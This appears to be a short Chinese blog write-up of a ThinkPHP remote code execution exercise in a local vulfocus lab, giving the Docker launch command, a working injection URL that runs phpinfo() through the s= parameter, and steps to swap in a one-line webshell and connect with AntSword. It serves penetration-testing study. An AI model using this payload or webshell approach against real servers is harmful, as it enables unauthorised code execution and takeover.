thinkphp框架远程代码执行

凌晨五点的星2024-07-31 11:30

一、环境

vulfocus网上自行下载

启动命令:

复制代码 
 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

复制代码 
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
悟道子HD7 小时前
SRC漏洞挖掘——2.SQL注入漏洞实战详解
sql·web安全·网络安全·渗透测试·sql注入·sqlmap·暴力破解
汤愈韬9 小时前
网络安全之网络基础知识_2
网络协议·安全·web安全
zjeweler10 小时前
网安护网面试-2-国誉护网面试
web安全·网络安全·面试·职场和发展·护网行动·护网面试
xian_wwq12 小时前
【学习笔记】GB/T 20986-2023 详解,10 类网络安全事件分类
笔记·学习·web安全
程序员晓晓13 小时前
【网络安全零基础入门】应急响应之服务器入侵排查,小白零基础入门到精通教程
服务器·web安全·计算机·网络安全·渗透测试·黑客技术·网安应急响应
赵侃侃爱分享14 小时前
网络安全常识十条
网络·安全·web安全
是小崔啊16 小时前
网络安全小白了解
网络·安全·web安全
酿情师1 天前
整数溢出漏洞详解:网络安全小白从零入门
安全·web安全
qq_260241231 天前
将盾CDN:威胁情报驱动的网络安全防御新范式
安全·web安全
qq_260241231 天前
将盾CDN:网络安全态势感知的建设与实践
安全·web安全
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南07开发者环境配置:用 Ollama 实现本地大模型部署(附下载慢的解决方案08UV安装并设置国内源09Oh My Codex 快速使用指南10AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析